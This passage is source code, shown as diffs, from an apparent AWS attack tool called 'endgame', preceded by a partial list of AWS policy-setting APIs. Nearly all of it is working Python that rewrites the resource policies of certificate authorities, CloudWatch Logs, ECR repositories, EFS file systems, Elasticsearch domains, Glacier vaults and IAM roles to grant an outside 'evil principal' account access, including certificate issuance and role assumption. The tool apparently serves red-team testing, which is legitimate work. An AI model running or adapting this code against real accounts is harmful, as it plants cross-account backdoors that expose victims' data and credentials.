- ses [put-identity-policy](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ses/put-identity-policy.html)
## Not Supported
### Backup
[Docs](https://docs.aws.amazon.com/aws-backup/latest/devguide/creating-a-vault-access-policy.html)
Actions:
- backup [put-backup-vault-access-policy](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/backup/put-backup-vault-access-policy.html)
### CloudWatch Logs (Destination Policies)
- logs [put-destination-policy](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/logs/put-destination-policy.html)
### EventBridge
Only allows sending data into an account
Actions:
- events [put-permission](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/events/put-permission.html)
### Glue
Actions:
- glue [put-resource-policy](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/glue/put-resource-policy.html)
### MediaStore
[Docs](https://docs.aws.amazon.com/mediastore/latest/ug/policies-examples-cross-acccount-full.html)
Actions:
- mediastore [put-container-policy](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/mediastore/put-container-policy.html)
### Serverless Application Repository
Actions:
- serverlessrepo [put-application-policy](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/serverlessrepo/put-application-policy.html)
### S3 Objects
S3 objects can be public via ACL. ACLs can be set at bucket or object creation.
- s3api [put-object](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/s3api/put-object.html)
- s3api [put-object-acl](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/s3api/put-object-acl.html)

View File

@ -0,0 +1,201 @@
import logging
import json
import boto3
import botocore
from abc import ABC
from botocore.exceptions import ClientError
from policy_sentry.util.arns import get_account_from_arn, get_resource_path_from_arn
from endgame.shared import constants
from endgame.exposure_via_resource_policies.common import ResourceType, ResourceTypes
from endgame.shared.policy_document import PolicyDocument
from endgame.shared.response_message import ResponseMessage, ResponseGetRbp
from endgame.shared.list_resources_response import ListResourcesResponse
logger = logging.getLogger(__name__)
# ACM PCA is really anal-retentive about what policies have to look like.
# If you don't do it exactly how they say you have to, then it returns this error:
# botocore.errorfactory.InvalidPolicyException: An error occurred (InvalidPolicyException) when calling the PutPolicy
# operation: InvalidPolicy: The supplied policy does not match RAM managed permissions
# https://docs.aws.amazon.com/acm-pca/latest/userguide/pca-rbp.html
# So we have to do things our own way.
class AcmPrivateCertificateAuthority(ResourceType, ABC):
def __init__(self, name: str, region: str, client: boto3.Session.client, current_account_id: str):
self.service = "acm-pca"
self.resource_type = "certificate-authority"
self.region = region
self.current_account_id = current_account_id
self.name = name
self.override_account_id_instead_of_principal = True
super().__init__(name, self.resource_type, self.service, region, client, current_account_id,
override_resource_block=self.arn,
override_account_id_instead_of_principal=self.override_account_id_instead_of_principal)
@property
def arn(self) -> str:
# return self.name
return f"arn:aws:{self.service}:{self.region}:{self.current_account_id}:{self.resource_type}/{self.name}"
def _get_rbp(self) -> ResponseGetRbp:
"""Get the resource based policy for this resource and store it"""
policy = constants.get_empty_policy()
try:
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/acm-pca.html#ACMPCA.Client.get_policy
response = self.client.get_policy(ResourceArn=self.arn)
policy = json.loads(response.get("Policy"))
success = True
# This is dumb. "If either the private CA resource or the policy cannot be found, this action returns a ResourceNotFoundException."
# That means we have to set it to true, even when the resource doesn't exist. smh.
# That will only affect the expose command and not the smash command.
except self.client.exceptions.ResourceNotFoundException:
logger.debug(f"Resource {self.name} not found")
success = True
except botocore.exceptions.ClientError:
# When there is no policy, let's return an empty policy to avoid breaking things
success = False
policy_document = PolicyDocument(
policy=policy,
service=self.service,
override_action=self.override_action,
include_resource_block=self.include_resource_block,
override_resource_block=self.override_resource_block,
override_account_id_instead_of_principal=self.override_account_id_instead_of_principal,
)
response = ResponseGetRbp(policy_document=policy_document, success=success)
return response
def set_rbp(self, evil_policy: dict) -> ResponseMessage:
new_policy = json.dumps(evil_policy)
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/acm-pca.html#ACMPCA.Client.put_policy
try:
self.client.put_policy(ResourceArn=self.arn, Policy=new_policy)
message = "success"
success = True
except botocore.exceptions.ClientError as error:
message = str(error)
success = False
response_message = ResponseMessage(message=message, operation="set_rbp", success=success, evil_principal="",
victim_resource_arn=self.arn, original_policy=self.original_policy,
updated_policy=evil_policy, resource_type=self.resource_type,
resource_name=self.name, service=self.service)
return response_message
def add_myself(self, evil_principal: str, dry_run: bool = False) -> ResponseMessage:
"""Add your rogue principal to the AWS resource"""
logger.debug(f"Adding {evil_principal} to {self.arn}")
# Case: principal = "arn:aws:iam::999988887777:user/mwahahaha"
if ":" in evil_principal:
evil_principal_account = get_account_from_arn(evil_principal)
# Case: Principal = * or Principal = 999988887777
else:
evil_principal_account = evil_principal
evil_policy = {
"Version": "2012-10-17",
"Statement": [
{
"Sid": "1",
"Effect": "Allow",
"Principal": {
"AWS": evil_principal_account
},
"Action": [
"acm-pca:DescribeCertificateAuthority",
"acm-pca:GetCertificate",
"acm-pca:GetCertificateAuthorityCertificate",
"acm-pca:ListPermissions",
"acm-pca:ListTags"
],
"Resource": self.arn
},
{
"Sid": "1",
"Effect": "Allow",
"Principal": {
"AWS": evil_principal_account
},
"Action": [
"acm-pca:IssueCertificate"
],
"Resource": self.arn,
"Condition": {
"StringEquals": {
"acm-pca:TemplateArn": "arn:aws:acm-pca:::template/EndEntityCertificate/V1"
}
}
}
]
}
if dry_run:
operation = "DRY_RUN_ADD_MYSELF"
message = operation
tmp = self._get_rbp()
success = tmp.success
else:
operation = "ADD_MYSELF"
self.undo(evil_principal=evil_principal)
set_rbp_response = self.set_rbp(evil_policy=evil_policy)
success = set_rbp_response.success
message = set_rbp_response.message
response_message = ResponseMessage(message=message, operation=operation, success=success, evil_principal=evil_principal,
victim_resource_arn=self.arn, original_policy=self.original_policy,
updated_policy=evil_policy, resource_type=self.resource_type,
resource_name=self.name, service=self.service)
return response_message
def undo(self, evil_principal: str, dry_run: bool = False) -> ResponseMessage:
logger.debug(f"Removing {evil_principal} from {self.arn}")
new_policy = constants.get_empty_policy()
operation = "UNDO"
if not dry_run:
# TODO: After you delete the policy, it still shows up in resource shares. Need to delete that.
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/acm-pca.html#ACMPCA.Client.delete_policy
# TODO: Error handling for setting policy
try:
self.client.delete_policy(ResourceArn=self.arn)
message = f"Deleted the resource policy for {self.arn}"
success = True
except botocore.exceptions.ClientError as error:
success = False
message = error
logger.critical(f"Operation was not successful for {self.service} {self.resource_type} "
f"{self.name}. %s" % error)
else:
message = f"The resource policy for {self.arn} will be deleted."
success = True
response_message = ResponseMessage(message=message, operation=operation, success=success, evil_principal=evil_principal,
victim_resource_arn=self.arn, original_policy=self.original_policy,
updated_policy=new_policy, resource_type=self.resource_type,
resource_name=self.name, service=self.service)
return response_message
class AcmPrivateCertificateAuthorities(ResourceTypes):
def __init__(self, client: boto3.Session.client, current_account_id: str, region: str):
super().__init__(client, current_account_id, region)
self.service = "acm-pca"
self.resource_type = "certificate-authority"
@property
def resources(self) -> [ListResourcesResponse]:
"""Get a list of these resources"""
resources = []
paginator = self.client.get_paginator("list_certificate_authorities")
page_iterator = paginator.paginate()
for page in page_iterator:
these_resources = page["CertificateAuthorities"]
for resource in these_resources:
arn = resource.get("Arn")
status = resource.get("Status")
ca_type = resource.get("Type")
name = get_resource_path_from_arn(arn)
list_resources_response = ListResourcesResponse(
service=self.service, account_id=self.current_account_id, arn=arn, region=self.region,
resource_type=self.resource_type, name=name)
if status == "ACTIVE":
resources.append(list_resources_response)
return resources

View File

@ -0,0 +1,193 @@
import logging
import json
import boto3
import botocore
from abc import ABC
from botocore.exceptions import ClientError
from endgame.shared import constants
from endgame.exposure_via_resource_policies.common import ResourceType, ResourceTypes
from endgame.shared.policy_document import PolicyDocument
from endgame.shared.response_message import ResponseMessage
from endgame.shared.list_resources_response import ListResourcesResponse
from endgame.shared.response_message import ResponseGetRbp
logger = logging.getLogger(__name__)
class CloudwatchResourcePolicy(ResourceType, ABC):
def __init__(self, name: str, region: str, client: boto3.Session.client, current_account_id: str):
service = "logs"
resource_type = "*"
# The Principal block in policies requires the use of account Ids (999988887777) instead of ARNs (
# "arn:aws:iam::999988887777:user/evil")
self.override_account_id_instead_of_principal = True
self.override_resource_block = self.arn
super().__init__(name, resource_type, service, region, client, current_account_id,
override_account_id_instead_of_principal=True,
override_resource_block=self.arn)
@property
def arn(self) -> str:
return "*"
@property
def policy_exists(self):
"""Return true if the policy exists already. CloudWatch resource policies are weird so we take
a different approach"""
response = self.client.describe_resource_policies()
result = False
if response.get("resourcePolicies"):
for item in response.get("resourcePolicies"):
if item.get("policyName") == constants.SID_SIGNATURE:
result = True
return result
def _get_rbp(self) -> ResponseGetRbp:
"""Get the resource based policy for this resource and store it"""
# When there is no policy, let's return an empty policy to avoid breaking things
empty_policy = constants.get_empty_policy()
policy_document = PolicyDocument(
policy=empty_policy, service=self.service,
override_action=self.override_action,
include_resource_block=self.include_resource_block,
override_resource_block=self.override_resource_block,
override_account_id_instead_of_principal=self.override_account_id_instead_of_principal,
)
try:
resources = {}
paginator = self.client.get_paginator("describe_resource_policies")
page_iterator = paginator.paginate()
for page in page_iterator:
these_resources = page["resourcePolicies"]
for resource in these_resources:
name = resource.get("policyName")
tmp_policy_document = json.loads(resource.get("policyDocument"))
resources[name] = dict(policyName=name, policyDocument=tmp_policy_document)
if resources:
if resources.get(constants.SID_SIGNATURE):
policy = resources[constants.SID_SIGNATURE]["policyDocument"]
policy_document = PolicyDocument(
policy=policy,
service=self.service,
override_action=self.override_action,
include_resource_block=self.include_resource_block,
override_resource_block=self.override_resource_block,
override_account_id_instead_of_principal=self.override_account_id_instead_of_principal,
)
success = True
response = ResponseGetRbp(policy_document=policy_document, success=success)
return response
except botocore.exceptions.ClientError as error:
logger.debug(error)
success = False
response = ResponseGetRbp(policy_document=policy_document, success=success)
return response
def add_myself(self, evil_principal: str, dry_run: bool = False) -> ResponseMessage:
"""Add your rogue principal to the AWS resource"""
logger.debug(f"Adding {evil_principal} to {self.arn}")
evil_policy = self.policy_document.policy_plus_evil_principal(
victim_account_id=self.current_account_id,
evil_principal=evil_principal,
resource_arn=self.arn
)
if dry_run:
operation = "DRY_RUN_ADD_MYSELF"
message = (f"The CloudWatch resource policy named {constants.SID_SIGNATURE} exists. We need to remove it"
f" first, then we will add on the new policy.")
tmp = self._get_rbp()
success = tmp.success
else:
operation = "ADD_MYSELF"
self.undo(evil_principal=evil_principal)
try:
self.client.put_resource_policy(policyName=constants.SID_SIGNATURE, policyDocument=json.dumps(evil_policy))
message = f"Added CloudWatch Resource Policy named {constants.SID_SIGNATURE}."
success = True
except botocore.exceptions.ClientError as error:
success = False
message = error
logger.critical(f"Operation was not successful for {self.service} {self.resource_type} "
f"{self.name}. %s" % error)
response_message = ResponseMessage(message=message, operation=operation, success=success, evil_principal=evil_principal,
victim_resource_arn=self.arn, original_policy=self.original_policy,
updated_policy=evil_policy, resource_type=self.resource_type,
resource_name=self.name, service=self.service)
return response_message
def set_rbp(self, evil_policy: dict) -> ResponseMessage:
new_policy = json.dumps(evil_policy)
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/logs.html#CloudWatchLogs.Client.put_resource_policy
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/logs.html#CloudWatchLogs.Client.put_destination_policy
success = True
try:
self.client.put_resource_policy(policyName=constants.SID_SIGNATURE, policyDocument=new_policy)
message = "success"
success = True
except self.client.exceptions.InvalidParameterException as error:
logger.debug(error)
logger.debug("Let's just try it again - AWS accepts it every other time.")
self.client.put_resource_policy(policyName=constants.SID_SIGNATURE, policyDocument=new_policy)
message = str(error)
success = True
except botocore.exceptions.ClientError as error:
message = str(error)
success = False
response_message = ResponseMessage(message=message, operation="set_rbp", success=success, evil_principal="",
victim_resource_arn=self.arn, original_policy=self.original_policy,
updated_policy=evil_policy, resource_type=self.resource_type,
resource_name=self.name, service=self.service)
return response_message
def undo(self, evil_principal: str, dry_run: bool = False) -> ResponseMessage:
"""Remove all traces"""
operation = "UNDO"
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/logs.html#CloudWatchLogs.Client.delete_resource_policy
if not self.policy_exists:
message = f"The policy {constants.SID_SIGNATURE} does not exist."
success = True
else:
try:
self.client.delete_resource_policy(policyName=constants.SID_SIGNATURE)
message = f"Deleted the CloudWatch resource policy named {constants.SID_SIGNATURE}"
success = True
except botocore.exceptions.ClientError as error:
success = False
message = error
logger.critical(f"Operation was not successful for {self.service} {self.resource_type} "
f"{self.name}. %s" % error)
new_policy = constants.get_empty_policy()
response_message = ResponseMessage(message=message, operation=operation, success=success,
evil_principal=evil_principal, victim_resource_arn=self.arn,
original_policy=self.original_policy, updated_policy=new_policy,
resource_type=self.resource_type, resource_name=self.name,
service=self.service)
return response_message
class CloudwatchResourcePolicies(ResourceTypes):
def __init__(self, client: boto3.Session.client, current_account_id: str, region: str):
super().__init__(client, current_account_id, region)
self.service = "cloudwatch"
self.resource_type = "resource-policy"
@property
def resources(self) -> [ListResourcesResponse]:
"""Get a list of these resources"""
resources = []
paginator = self.client.get_paginator("describe_resource_policies")
page_iterator = paginator.paginate()
for page in page_iterator:
these_resources = page["resourcePolicies"]
for resource in these_resources:
name = resource.get("policyName")
# This is not a real ARN.
# We made it up because AWS doesn't have ARNs for CloudWatch resource policies ¯\_(ツ)_/¯
arn = f"arn:aws:logs:{self.region}:{self.current_account_id}:resource-policy:{name}"
list_resources_response = ListResourcesResponse(
service=self.service, account_id=self.current_account_id, arn=arn, region=self.region,
resource_type=self.resource_type, name=name)
resources.append(list_resources_response)
return resources

View File

@ -0,0 +1,133 @@
from abc import ABCMeta, abstractmethod
import json
import logging
import copy
import boto3
import botocore
from botocore.exceptions import ClientError
from endgame.shared.response_message import ResponseMessage
from endgame.shared.list_resources_response import ListResourcesResponse
from endgame.shared.response_message import ResponseGetRbp
logger = logging.getLogger(__name__)
class ResourceType(object):
__meta_class__ = ABCMeta
def __init__(
self,
name: str,
resource_type: str,
service: str,
region: str,
client: boto3.Session.client,
current_account_id: str,
override_action: str = None,
include_resource_block: bool = True,
override_resource_block: str = None,
override_account_id_instead_of_principal: bool = False
):
self.name = name
self.resource_type = resource_type
self.client = client
self.current_account_id = current_account_id
self.service = service
self.region = region
self.include_resource_block = include_resource_block # Override for IAM
self.override_action = override_action # Override for IAM
self.override_resource_block = override_resource_block # Override for EFS
self.override_account_id_instead_of_principal = override_account_id_instead_of_principal # Override for logs, sns, sqs, and lambda
self.policy_document = self._get_rbp().policy_document
# Store an original copy of the policy so we can compare it later.
self.original_policy = copy.deepcopy(json.loads(json.dumps(self.policy_document.original_policy)))
def __str__(self):
return '%s' % (json.dumps(json.loads(self.policy_document.__str__())))
@abstractmethod
def _get_rbp(self) -> ResponseGetRbp:
raise NotImplementedError("Must override _get_rbp")
@property
@abstractmethod
def arn(self) -> str:
raise NotImplementedError("Must override arn")
@abstractmethod
def set_rbp(self, evil_policy: dict) -> ResponseMessage:
raise NotImplementedError("Must override set_rbp")
def add_myself(self, evil_principal: str, dry_run: bool = False) -> ResponseMessage:
"""Add your rogue principal to the AWS resource"""
logger.debug(f"Adding {evil_principal} to {self.arn}")
evil_policy = self.policy_document.policy_plus_evil_principal(
victim_account_id=self.current_account_id,
evil_principal=evil_principal,
resource_arn=self.arn
)
if not dry_run:
set_rbp_response = self.set_rbp(evil_policy=evil_policy)
operation = "ADD_MYSELF"
message = set_rbp_response.message
success = set_rbp_response.success
else:
# new_policy = evil_policy
operation = "DRY_RUN_ADD_MYSELF"
message = "DRY_RUN_ADD_MYSELF"
try:
tmp = self._get_rbp()
success = tmp.success
except botocore.exceptions.ClientError as error:
message = str(error)
success = False
response_message = ResponseMessage(message=message, operation=operation, success=success,
evil_principal=evil_principal, victim_resource_arn=self.arn,
original_policy=self.original_policy, updated_policy=evil_policy,
resource_type=self.resource_type, resource_name=self.name,
service=self.service)
return response_message
def undo(self, evil_principal: str, dry_run: bool = False) -> ResponseMessage:
"""Remove all traces"""
logger.debug(f"Removing {evil_principal} from {self.arn}")
policy_stripped = self.policy_document.policy_minus_evil_principal(
victim_account_id=self.current_account_id,
evil_principal=evil_principal,
resource_arn=self.arn
)
if not dry_run:
operation = "UNDO"
set_rbp_response = self.set_rbp(evil_policy=policy_stripped)
message = set_rbp_response.message
success = set_rbp_response.success
else:
operation = "DRY_RUN_UNDO"
message = "DRY_RUN_UNDO"
success = True
response_message = ResponseMessage(message=message, operation=operation, success=success,
evil_principal=evil_principal, victim_resource_arn=self.arn,
original_policy=self.original_policy, updated_policy=policy_stripped,
resource_type=self.resource_type, resource_name=self.name,
service=self.service)
return response_message
class ResourceTypes(object):
__meta_class__ = ABCMeta
def __init__(self, client: boto3.Session.client, current_account_id: str, region: str):
self.client = client
self.current_account_id = current_account_id
self.region = region
def __str__(self):
return '%s' % (json.dumps(self.resources.arn))
@property
@abstractmethod
def resources(self) -> [ListResourcesResponse]:
raise NotImplementedError("Must override property 'resources'")

View File

@ -0,0 +1,101 @@
import logging
import json
import boto3
import botocore
from abc import ABC
from botocore.exceptions import ClientError
from endgame.shared import constants
from endgame.exposure_via_resource_policies.common import ResourceType, ResourceTypes
from endgame.shared.policy_document import PolicyDocument
from endgame.shared.list_resources_response import ListResourcesResponse
from endgame.shared.response_message import ResponseMessage
from endgame.shared.response_message import ResponseGetRbp
logger = logging.getLogger(__name__)
class EcrRepository(ResourceType, ABC):
def __init__(self, name: str, region: str, client: boto3.Session.client, current_account_id: str):
self.service = "ecr"
self.resource_type = "repository"
self.region = region
self.current_account_id = current_account_id
self.name = name
self.include_resource_block = False
super().__init__(name, self.resource_type, self.service, region, client, current_account_id,
include_resource_block=self.include_resource_block)
@property
def arn(self) -> str:
return f"arn:aws:{self.service}:{self.region}:{self.current_account_id}:{self.resource_type}/{self.name}"
def _get_rbp(self) -> ResponseGetRbp:
"""Get the resource based policy for this resource and store it"""
logger.debug("Getting resource policy for %s" % self.arn)
policy = constants.get_empty_policy()
try:
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/ecr.html#ECR.Client.get_repository_policy
response = self.client.get_repository_policy(repositoryName=self.name)
policy = json.loads(response.get("policyText"))
success = True
except self.client.exceptions.RepositoryPolicyNotFoundException:
logger.debug("Policy not found. Setting policy document to empty.")
success = True
except self.client.exceptions.RepositoryNotFoundException:
logger.critical("Repository does not exist")
success = False
except botocore.exceptions.ClientError:
# When there is no policy, let's return an empty policy to avoid breaking things
success = False
policy_document = PolicyDocument(
policy=policy,
service=self.service,
override_action=self.override_action,
include_resource_block=self.include_resource_block,
override_resource_block=self.override_resource_block,
override_account_id_instead_of_principal=self.override_account_id_instead_of_principal,
)
response = ResponseGetRbp(policy_document=policy_document, success=success)
return response
def set_rbp(self, evil_policy: dict) -> ResponseMessage:
logger.debug("Setting resource policy for %s" % self.arn)
new_policy = json.dumps(evil_policy)
try:
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/ecr.html#ECR.Client.set_repository_policy
self.client.set_repository_policy(repositoryName=self.name, policyText=new_policy)
message = "success"
success = True
except botocore.exceptions.ClientError as error:
message = str(error)
success = False
response_message = ResponseMessage(message=message, operation="set_rbp", success=success, evil_principal="",
victim_resource_arn=self.arn, original_policy=self.original_policy,
updated_policy=evil_policy, resource_type=self.resource_type,
resource_name=self.name, service=self.service)
return response_message
class EcrRepositories(ResourceTypes):
def __init__(self, client: boto3.Session.client, current_account_id: str, region: str):
super().__init__(client, current_account_id, region)
self.service = "ecr"
self.resource_type = "repository"
@property
def resources(self) -> [ListResourcesResponse]:
"""Get a list of these resources"""
resources = []
paginator = self.client.get_paginator("describe_repositories")
page_iterator = paginator.paginate()
for page in page_iterator:
these_resources = page["repositories"]
for resource in these_resources:
name = resource.get("repositoryName")
arn = resource.get("repositoryArn")
list_resources_response = ListResourcesResponse(
service=self.service, account_id=self.current_account_id, arn=arn, region=self.region,
resource_type=self.resource_type, name=name)
resources.append(list_resources_response)
return resources

View File

@ -0,0 +1,99 @@
import logging
import json
import boto3
import botocore
from abc import ABC
from botocore.exceptions import ClientError
from endgame.shared import constants
from endgame.exposure_via_resource_policies.common import ResourceType, ResourceTypes
from endgame.shared.policy_document import PolicyDocument
from endgame.shared.list_resources_response import ListResourcesResponse
from endgame.shared.response_message import ResponseMessage
from endgame.shared.response_message import ResponseGetRbp
logger = logging.getLogger(__name__)
class ElasticFileSystem(ResourceType, ABC):
def __init__(self, name: str, region: str, client: boto3.Session.client, current_account_id: str):
self.service = "elasticfilesystem"
self.resource_type = "file-system"
self.region = region
self.current_account_id = current_account_id
self.name = name
# Override parent defaults because EFS is weird with the resource block requirements
self.override_resource_block = self.arn
super().__init__(name, self.resource_type, self.service, region, client, current_account_id,
override_resource_block=self.override_resource_block)
@property
def arn(self) -> str:
# NOTE: self.name represents the File System ID
return f"arn:aws:{self.service}:{self.region}:{self.current_account_id}:{self.resource_type}/{self.name}"
def _get_rbp(self) -> ResponseGetRbp:
"""Get the resource based policy for this resource and store it"""
logger.debug("Getting resource policy for %s" % self.arn)
try:
response = self.client.describe_file_system_policy(FileSystemId=self.name)
policy = json.loads(response.get("Policy"))
success = True
except self.client.exceptions.PolicyNotFound as error:
policy = constants.get_empty_policy()
success = True
except botocore.exceptions.ClientError:
# When there is no policy, let's return an empty policy to avoid breaking things
policy = constants.get_empty_policy()
success = False
policy_document = PolicyDocument(
policy=policy,
service=self.service,
override_action=self.override_action,
include_resource_block=self.include_resource_block,
override_resource_block=self.override_resource_block,
override_account_id_instead_of_principal=self.override_account_id_instead_of_principal,
)
response = ResponseGetRbp(policy_document=policy_document, success=success)
return response
def set_rbp(self, evil_policy: dict) -> ResponseMessage:
logger.debug("Setting resource policy for %s" % self.arn)
new_policy = json.dumps(evil_policy)
try:
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/efs.html#EFS.Client.put_file_system_policy
self.client.put_file_system_policy(FileSystemId=self.name, Policy=new_policy)
message = "success"
success = True
except botocore.exceptions.ClientError as error:
message = str(error)
success = False
response_message = ResponseMessage(message=message, operation="set_rbp", success=success, evil_principal="",
victim_resource_arn=self.arn, original_policy=self.original_policy,
updated_policy=evil_policy, resource_type=self.resource_type,
resource_name=self.name, service=self.service)
return response_message
class ElasticFileSystems(ResourceTypes):
def __init__(self, client: boto3.Session.client, current_account_id: str, region: str):
super().__init__(client, current_account_id, region)
self.service = "elasticfilesystem"
self.resource_type = "file-system"
@property
def resources(self) -> [ListResourcesResponse]:
"""Get a list of these resources"""
resources = []
paginator = self.client.get_paginator("describe_file_systems")
page_iterator = paginator.paginate()
for page in page_iterator:
these_resources = page["FileSystems"]
for resource in these_resources:
fs_id = resource.get("FileSystemId")
arn = resource.get("FileSystemArn")
list_resources_response = ListResourcesResponse(
service=self.service, account_id=self.current_account_id, arn=arn, region=self.region,
resource_type=self.resource_type, name=fs_id)
resources.append(list_resources_response)
return resources

View File

@ -0,0 +1,98 @@
import sys
import logging
import json
import boto3
import botocore
from abc import ABC
from botocore.exceptions import ClientError
from endgame.shared import constants
from endgame.exposure_via_resource_policies.common import ResourceType, ResourceTypes
from endgame.shared.policy_document import PolicyDocument
from endgame.shared.list_resources_response import ListResourcesResponse
from endgame.shared.response_message import ResponseMessage
from endgame.shared.response_message import ResponseGetRbp
logger = logging.getLogger(__name__)
class ElasticSearchDomain(ResourceType, ABC):
def __init__(self, name: str, region: str, client: boto3.Session.client, current_account_id: str):
self.service = "es"
self.resource_type = "domain"
self.region = region
self.current_account_id = current_account_id
self.name = name
super().__init__(name, self.resource_type, self.service, region, client, current_account_id)
@property
def arn(self) -> str:
return f"arn:aws:{self.service}:{self.region}:{self.current_account_id}:{self.resource_type}/{self.name}"
def _get_rbp(self) -> ResponseGetRbp:
"""Get the resource based policy for this resource and store it"""
logger.debug("Getting resource policy for %s" % self.arn)
try:
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/ses.html#SES.Client.list_identity_policies
response = self.client.describe_elasticsearch_domain_config(DomainName=self.name)
domain_config = response.get("DomainConfig")
policy = domain_config.get("AccessPolicies").get("Options")
if policy:
policy = json.loads(policy)
else:
policy = constants.get_empty_policy()
success = True
except botocore.exceptions.ClientError:
# When there is no policy, let's return an empty policy to avoid breaking things
policy = constants.get_empty_policy()
success = False
policy_document = PolicyDocument(
policy=policy,
service=self.service,
override_action=self.override_action,
include_resource_block=self.include_resource_block,
override_resource_block=self.override_resource_block,
override_account_id_instead_of_principal=self.override_account_id_instead_of_principal,
)
response = ResponseGetRbp(policy_document=policy_document, success=success)
return response
def set_rbp(self, evil_policy: dict) -> ResponseMessage:
new_policy = json.dumps(evil_policy)
logger.debug("Setting resource policy for %s" % self.arn)
try:
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/es.html#ElasticsearchService.Client.update_elasticsearch_domain_config
self.client.update_elasticsearch_domain_config(DomainName=self.name, AccessPolicies=new_policy)
message = "success"
success = True
except botocore.exceptions.ClientError as error:
message = str(error)
success = False
response_message = ResponseMessage(message=message, operation="set_rbp", success=success, evil_principal="",
victim_resource_arn=self.arn, original_policy=self.original_policy,
updated_policy=evil_policy, resource_type=self.resource_type,
resource_name=self.name, service=self.service)
return response_message
class ElasticSearchDomains(ResourceTypes):
def __init__(self, client: boto3.Session.client, current_account_id: str, region: str):
super().__init__(client, current_account_id, region)
self.service = "elasticsearch"
self.resource_type = "domain"
@property
def resources(self) -> [ListResourcesResponse]:
"""Get a list of these resources"""
resources = []
response = self.client.list_domain_names()
if response.get("DomainNames"):
for domain_name in response.get("DomainNames"):
name = domain_name.get("DomainName")
arn = f"arn:aws:{self.service}:{self.region}:{self.current_account_id}:{self.resource_type}/{name}"
list_resources_response = ListResourcesResponse(
service=self.service, account_id=self.current_account_id, arn=arn, region=self.region,
resource_type=self.resource_type, name=name)
# resources.append(domain_name.get("DomainName"))
resources.append(list_resources_response)
return resources

View File

@ -0,0 +1,98 @@
import logging
import json
import boto3
import botocore
from abc import ABC
from botocore.exceptions import ClientError
from endgame.shared import constants
from endgame.exposure_via_resource_policies.common import ResourceType, ResourceTypes
from endgame.shared.policy_document import PolicyDocument
from endgame.shared.list_resources_response import ListResourcesResponse
from endgame.shared.response_message import ResponseMessage
from endgame.shared.response_message import ResponseGetRbp
logger = logging.getLogger(__name__)
class GlacierVault(ResourceType, ABC):
def __init__(self, name: str, region: str, client: boto3.Session.client, current_account_id: str):
self.service = "glacier"
self.resource_type = "vaults"
self.region = region
self.current_account_id = current_account_id
self.name = name
super().__init__(name, self.resource_type, self.service, region, client, current_account_id,
override_resource_block=self.arn)
@property
def arn(self) -> str:
return f"arn:aws:{self.service}:{self.region}:{self.current_account_id}:{self.resource_type}/{self.name}"
def _get_rbp(self) -> ResponseGetRbp:
"""Get the resource based policy for this resource and store it"""
logger.debug("Getting resource policy for %s" % self.arn)
# When there is no policy, let's return an empty policy to avoid breaking things
policy = constants.get_empty_policy()
try:
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/glacier.html#Glacier.Client.get_vault_access_policy
response = self.client.get_vault_access_policy(vaultName=self.name)
policy = json.loads(response.get("policy").get("Policy"))
success = True
# This is silly. If there is no access policy set on the vault, then it returns the same error as if the vault didn't exist.
except self.client.exceptions.ResourceNotFoundException as error:
logger.debug(error)
success = True
except botocore.exceptions.ClientError:
success = False
policy_document = PolicyDocument(
policy=policy,
service=self.service,
override_action=self.override_action,
include_resource_block=self.include_resource_block,
override_resource_block=self.override_resource_block,
override_account_id_instead_of_principal=self.override_account_id_instead_of_principal,
)
response = ResponseGetRbp(policy_document=policy_document, success=success)
return response
def set_rbp(self, evil_policy: dict) -> ResponseMessage:
logger.debug("Setting resource policy for %s" % self.arn)
new_policy = json.dumps(evil_policy)
try:
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/glacier.html#Glacier.Client.set_vault_access_policy
self.client.set_vault_access_policy(vaultName=self.name, policy={"Policy": new_policy})
message = "success"
success = True
except botocore.exceptions.ClientError as error:
message = str(error)
success = False
response_message = ResponseMessage(message=message, operation="set_rbp", success=success, evil_principal="",
victim_resource_arn=self.arn, original_policy=self.original_policy,
updated_policy=evil_policy, resource_type=self.resource_type,
resource_name=self.name, service=self.service)
return response_message
class GlacierVaults(ResourceTypes):
def __init__(self, client: boto3.Session.client, current_account_id: str, region: str):
super().__init__(client, current_account_id, region)
self.service = "glacier"
self.resource_type = "vaults"
@property
def resources(self) -> [ListResourcesResponse]:
"""Get a list of these resources"""
resources = []
paginator = self.client.get_paginator("list_vaults")
page_iterator = paginator.paginate()
for page in page_iterator:
these_resources = page["VaultList"]
for resource in these_resources:
name = resource.get("VaultName")
arn = resource.get("VaultARN")
list_resources_response = ListResourcesResponse(
service=self.service, account_id=self.current_account_id, arn=arn, region=self.region,
resource_type=self.resource_type, name=name)
resources.append(list_resources_response)
return resources

View File

@ -0,0 +1,107 @@
import logging
import json
import boto3
import botocore
from abc import ABC
from botocore.exceptions import ClientError
from endgame.shared import constants
from endgame.exposure_via_resource_policies.common import ResourceType, ResourceTypes
from endgame.shared.policy_document import PolicyDocument
from endgame.shared.list_resources_response import ListResourcesResponse
from endgame.shared.response_message import ResponseMessage
from endgame.shared.response_message import ResponseGetRbp
logger = logging.getLogger(__name__)
class IAMRole(ResourceType, ABC):
def __init__(self, name: str, region: str, client: boto3.Session.client, current_account_id: str):
self.service = "iam"
self.resource_type = "role"
self.region = region
self.current_account_id = current_account_id
self.name = name
# Override parent values due to IAM being special
# Don't include the "Resource" block in the policy, or else the policy update will fail
# Instead of iam:*, we want to give sts:AssumeRole
self.include_resource_block = False
self.override_action = "sts:AssumeRole"
super().__init__(name, self.resource_type, self.service, region, client, current_account_id,
